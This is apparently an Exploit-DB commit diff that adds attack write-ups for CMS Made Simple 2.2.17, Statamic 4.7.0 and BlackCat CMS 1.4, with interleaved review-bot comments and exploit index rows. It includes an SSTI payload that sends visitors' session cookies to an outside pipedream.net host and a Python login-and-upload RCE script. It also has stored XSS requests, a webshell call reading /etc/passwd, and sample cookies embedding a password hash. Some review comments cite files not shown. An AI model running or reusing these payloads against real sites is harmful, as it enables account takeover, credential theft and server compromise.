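Review bot: `$base_url` is expanded unquoted in every `curl` call in 51598.sh (`curl -I -s $base_url`, `$base_url/add-pig.php`), so a URL containing `?`, `*` or spaces is subject to globbing and word splitting; write `"$base_url"` and `"${base_url}/add-pig.php"`. The bare `exit` after "No URL specified!" returns the status of the preceding `echo`, i.e. 0, and should be `exit 1`. The two status tests are inconsistent, `[[ $req == "200" ]]` inside the function and `[[ $req -eq "200" ]]` at the bottom, where the latter evaluates `$req` arithmetically; use the string form in both. `shell.php` is written into the current directory and never removed, which `trap 'rm -f shell.php' EXIT` near the top would handle.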
@@ -0,0 +1,60 @@ +#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) +#Application: CmsMadeSimple +#Version: v2.2.17 +#Bugs: SSTI +#Technology: PHP +#Vendor URL: https://www.cmsmadesimple.org/ +#Software Link: https://www.cmsmadesimple.org/downloads/cmsms +#Date of found: 13-07-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + + +2. Technical Details & POC +======================================== +Steps: + +1. Login to test user account +2. Go to Content Manager +3. Add New Content +4. set as +''' +{$smarty.version} +{{7*7}} +{$smarty.now} +{$smarty.template} + + + +''' +to conten_en section. + +5.If any user visit to page, Hacker hijack all cookie + +payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E + +POC Request + +POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1 +Host: localhost +Content-Length: 988 +sec-ch-ua: +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +sec-ch-ua-platform: "" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 
34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd +Connection: close + +mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1 + +Poc Video: https://youtu.be/zq3u3jRpfqM \ No newline at end of file diff --git a/exploits/php/webapps/51600.txt b/exploits/php/webapps/51600.txt new file mode 100644 index 000000000..0dfb173d3 --- /dev/null +++ b/exploits/php/webapps/51600.txt 
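Review bot: The title of 51599.txt presents this as session hijacking via SSTI, but the steps begin with "Login to test user account" and "Add New Content", so the precondition is an authenticated account with content-editing rights; the header should say so, and the same omission applies to 51601.txt (stored XSS through the `metadata` field). Step 4 refers to the "conten_en section", which should be `content_en` as in the request body. Neither file gives a fixed version or mitigation; a closing line stating that editor-supplied content must not be evaluated as a Smarty template with access to `$smarty.cookies` would give operators something to act on.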
@@ -0,0 +1,63 @@ +#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) +#Application: CmsMadeSimple +#Version: v2.2.17 +#Bugs: Remote Code Execution(RCE) +#Technology: PHP +#Vendor URL: https://www.cmsmadesimple.org/ +#Software Link: https://www.cmsmadesimple.org/downloads/cmsms +#Date of found: 12-07-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + + +import requests + +login_url = 'http://localhost/admin/login.php' +username=input('username = ') +password=input('password = ') + + +upload_url = 'http://localhost/admin/moduleinterface.php' + +file_path = input("please phar file name but file must same directory with python file and file content : : ") +#phar file content """"""""" + +login_data = { + 'username': username, + 'password': password, + 'loginsubmit': 'Submit' +} + + +session = requests.Session() +response = session.post(login_url, data=login_data) + + +if response.status_code == 200: + print('Login account') +else: + print('Login promlem.') + exit() + + +files = { + 'm1_files[]': open(file_path, 'rb') +} + +data = { + 'mact': 'FileManager,m1_,upload,0', + '__c': session.cookies['__c'], + 'disable_buffer': '1' +} + + +response = session.post(upload_url, files=files, data=data) + + +if response.status_code == 200: + print('file upload') + rce_url=f"http://localhost/uploads/{file_path}" + rce=requests.get(rce_url) + print(rce.text) +else: + print('file not upload') \ No newline at end of file diff --git a/exploits/php/webapps/51601.txt b/exploits/php/webapps/51601.txt new file mode 100644 index 000000000..5b2580641 --- /dev/null +++ b/exploits/php/webapps/51601.txt 
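Review bot: In 51600.txt the upload handle is opened inline, `'m1_files[]': open(file_path, 'rb')`, and is never closed; wrap the upload in `with open(file_path, 'rb') as fh:` and pass `fh` instead. The password is read with `input('password = ')`, which echoes it to the terminal and scrollback, where `getpass.getpass('password = ')` would not. The bare `exit()` on the login-failure path should be `sys.exit(1)`. The content is a Python script but is committed as `.txt` with mode 100644, unlike the other scripts in this commit, and the header has no line stating that valid credentials for an account with File Manager access are required.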
@@ -0,0 +1,47 @@
+#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
+#Application: CmsMadeSimple
+#Version: v2.2.17
+#Bugs: Stored Xss
+#Technology: PHP
+#Vendor URL: https://www.cmsmadesimple.org/
+#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
+#Date of found: 12-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+1. Login to account
+2. Go to Content Manager
+3. Add New Content
+4. Type as '' to metadata section
+
+payload:
+
+5. Submit Content
+6. Visit Content (http://localhost/index.php?page=test)
+
+Request:
+
+POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
+Host: localhost
+Content-Length: 584
+sec-ch-ua:
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
+Connection: close
+
+mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1 \ No newline at end of file diff --git a/exploits/php/webapps/51602.txt b/exploits/php/webapps/51602.txt new file mode 100644 index 000000000..d5b0bf507 --- /dev/null +++ b/exploits/php/webapps/51602.txt @@ -0,0 +1,36 @@ +## Title: Statamic 4.7.0 - File-Inclusion +## Author: nu11secur1ty +## Date: 07.13.2023 +## Vendor: https://statamic.com/ +## Software: https://demo.statamic.com/ +## Reference: https://portswigger.net/web-security/file-upload + + +## Description: +The statamic-4.7.0 suffers from file inclusion - file upload vulnerability. +The attacker can upload a malicious HTML file and can share the +malicious URL which uses the infected HTML file +to the other attackers in the network, they easily can look at the +token session key and can do very dangerous stuff. + + +## Staus: HIGH Vulnerability + +[+]Exploit: + +```js + + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html) + +## Time spend: +01:10:00 \ No newline at end of file diff --git a/exploits/php/webapps/51604.txt b/exploits/php/webapps/51604.txt new file mode 100644 index 000000000..87912f45b --- /dev/null +++ b/exploits/php/webapps/51604.txt 
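Review bot: The `Cookie:` header in the sample request of `51601.txt` publishes live-looking session material rather than placeholders. Besides `CMSSESSID852a6e69ca02` and `__c`, the long `34a3083b…` cookie value appears to be URL-encoded base64 of a JSON object that holds the account name and a `$2y$10$…` password hash. Even for a lab install that is credential material committed verbatim, and the write-up loses nothing if it is replaced, e.g. `Cookie: CMSSESSID<id>=<redacted>; <auth-cookie>=<redacted>; __c=<redacted>`. The hunk that ends just before the `51600.txt` header shows the same cookie layout and would need the same redaction.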
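Review bot: The title of `51602.txt` says "File-Inclusion", but the description and the PortSwigger file-upload reference describe an uploaded HTML file that is later opened by other users. That is an unrestricted file upload leading to script execution in the victim's browser, not a server-side include, and the difference matters for triage because file inclusion usually implies reading or executing files on the server. A title such as `## Title: Statamic 4.7.0 - Unrestricted File Upload (HTML)` would match the text, and "to the other attackers in the network" presumably means other users. The `[+]Exploit:` fence is empty in this view, so the affected upload field cannot be confirmed from the hunk.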
@@ -0,0 +1,20 @@
+Exploit Title: Blackcat Cms v1.4 - Stored XSS
+Application: blackcat Cms
+Version: v1.4
+Bugs: Stored XSS
+Technology: PHP
+Vendor URL: https://blackcat-cms.org/
+Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
+Date of found: 13.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. login to account
+2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
+3. set as
+4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51605.txt b/exploits/php/webapps/51605.txt
new file mode 100644
index 000000000..52402acad
--- /dev/null
+++ b/exploits/php/webapps/51605.txt
@@ -0,0 +1,65 @@ +Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) +Application: blackcat Cms +Version: v1.4 +Bugs: RCE +Technology: PHP +Vendor URL: https://blackcat-cms.org/ +Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS +Date of found: 13.07.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: +1. login to account as admin +2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) +3. upload zip file but this zip file must contains poc.php +poc.php file contents + +4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd + +Poc request + +POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 +Host: localhost +Content-Length: 577 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti +Connection: close + +------WebKitFormBoundaryBRByJwW3CUSHOcBT +Content-Disposition: form-data; name="upload" + +1 +------WebKitFormBoundaryBRByJwW3CUSHOcBT +Content-Disposition: form-data; name="userfile"; filename="poc.zip" +Content-Type: application/zip + 
+PKvalsdalsfapoc.php +blabalaboalpoc.php +blablabla +------WebKitFormBoundaryBRByJwW3CUSHOcBT +Content-Disposition: form-data; name="submit" + +Upload +------WebKitFormBoundaryBRByJwW3CUSHOcBT-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 23a589119..1d48cdf65 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -3622,6 +3622,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",2022-02-16,LiquidWorm,remote,hardware,,2022-02-16,2022-02-16,0,,,,,, 32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",remote,hardware,,2014-04-08,2016-12-18,0,OSVDB-105590;OSVDB-105589;OSVDB-105588;OSVDB-105587;OSVDB-105586;OSVDB-105585;OSVDB-105584;OSVDB-105583,,,,, 43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/c57ef2ae2447f8ee7e39554de5f51758a15a9580/Herospeed-TelnetSwitch.py +51607,exploits/hardware/remote/51607.py,"Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution",2023-07-19,"Thurein Soe",remote,hardware,,2023-07-19,2023-07-19,0,CVE-2022-28171,,,,, 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/tothi/pwn-hisilicon-dvr/blob/42d8325e68fdb075fe27df8a269932f9fa9601a6/pwn_hisilicon_dvr.py 48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,, 47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,, 
@@ -3998,6 +3999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware,,2015-07-16,2016-09-15,0,,,,,,https://pierrekim.github.io/advisories/2015-totolink-0x02.txt 31261,exploits/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,webapps,hardware,443,2014-01-29,2014-01-29,0,OSVDB-102657,,,,, 17376,exploits/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-07-24,1,OSVDB-72941,,,,, +51603,exploits/hardware/webapps/51603.py,"ABB FlowX v4.00 - Exposure of Sensitive Information",2023-07-19,"Paul Smith",webapps,hardware,,2023-07-19,2023-07-19,0,CVE-2023-1258,,,,, 46132,exploits/hardware/webapps/46132.txt,"Across DR-810 ROM-0 - Backup File Disclosure",2019-01-14,SajjadBnd,webapps,hardware,80,2019-01-14,2019-01-14,0,,,,,, 44982,exploits/hardware/webapps/44982.txt,"ADB Broadband Gateways / Routers - Authorization Bypass",2018-07-05,"SEC Consult",webapps,hardware,80,2018-07-05,2018-07-05,0,CVE-2018-13109,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 38245,exploits/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,webapps,hardware,,2015-09-20,2015-09-20,0,OSVDB-127902;OSVDB-127901;OSVDB-127900,,,,,http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html 
@@ -4879,6 +4881,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,,2020-11-23,2020-11-23,0,CVE-2020-24363,,,,, 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,, +51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,, 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,, 34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,, 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,, 
@@ -10359,6 +10362,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,, 51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,, +51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,, 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f 44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,,2018-03-09,2018-03-09,0,CVE-2017-5415,,,,,https://github.com/649/CVE-2017-5415/tree/209b7ae6882a18ae51b1222a68c040a3bc9a8bc5 10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",local,multiple,,2009-12-17,,1,CVE-2009-1839;OSVDB-55163,,,,, 
@@ -14436,6 +14440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php,,2006-05-24,,1,OSVDB-25828;CVE-2006-2682,,,,, 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip, +51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info 37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info 
@@ -14807,6 +14812,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,,2021-02-16,2021-02-16,0,,,,,, 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php,,2021-04-21,2021-04-21,0,,,,,, 48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php,,2020-09-21,2020-09-21,0,CVE-2020-25453,,,,, +51605,exploits/php/webapps/51605.txt,"Blackcat Cms v1.4 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, +51604,exploits/php/webapps/51604.txt,"Blackcat Cms v1.4 - Stored XSS",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 38311,exploits/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,webapps,php,,2013-02-12,2015-09-24,1,,,,,,https://www.securityfocus.com/bid/57910/info 1683,exploits/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,webapps,php,,2006-04-15,,1,OSVDB-24803;CVE-2006-1917,,,,, 34209,exploits/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,webapps,php,,2010-06-28,2014-07-30,1,,,,,,https://www.securityfocus.com/bid/41190/info 
@@ -15909,6 +15916,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",2021-10-01,"Halit AKAYDIN",webapps,php,,2021-10-01,2021-10-01,0,,,,,http://www.exploit-db.comCMSimple_XH-1.7.4.zip, 43075,exploits/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15984,,,,, 24959,exploits/php/webapps/24959.py,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,webapps,php,,2013-04-15,2013-04-15,0,OSVDB-92326;OSVDB-92325;OSVDB-92324;OSVDB-92323;OSVDB-92322;OSVDB-92321;OSVDB-92320;CVE-2013-3535,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php +51600,exploits/php/webapps/51600.txt,"CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, +51599,exploits/php/webapps/51599.txt,"CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, +51601,exploits/php/webapps/51601.txt,"CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,, 2766,exploits/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,webapps,php,,2006-11-11,2016-09-14,1,OSVDB-34029;CVE-2006-7185,,,,http://www.exploit-db.comCMSmelborp.zip, 9311,exploits/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,webapps,php,,2009-07-29,,1,OSVDB-56646;CVE-2009-3507;OSVDB-56645;OSVDB-56644;CVE-2009-3506,,,,, 17592,exploits/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,webapps,php,,2011-08-01,2013-12-08,0,OSVDB-74376,,,,, 
@@ -21875,6 +21885,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,,2018-02-05,2018-02-05,0,CVE-2018-6604,,,,http://www.exploit-db.compkg_zhyandexmap-j30-6.2.1.0-final.zip, 12283,exploits/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64247;CVE-2010-1602,,,,http://www.exploit-db.comcom_zimbComment081b.zip, 12284,exploits/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64248;CVE-2010-1603,,,,http://www.exploit-db.comzimbcore.zip, +51595,exploits/php/webapps/51595.py,"Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)",2023-07-19,qw3rTyTy,webapps,php,,2023-07-19,2023-07-19,0,,,,,, 48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,,2020-03-30,2020-03-30,0,,,,,, 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL 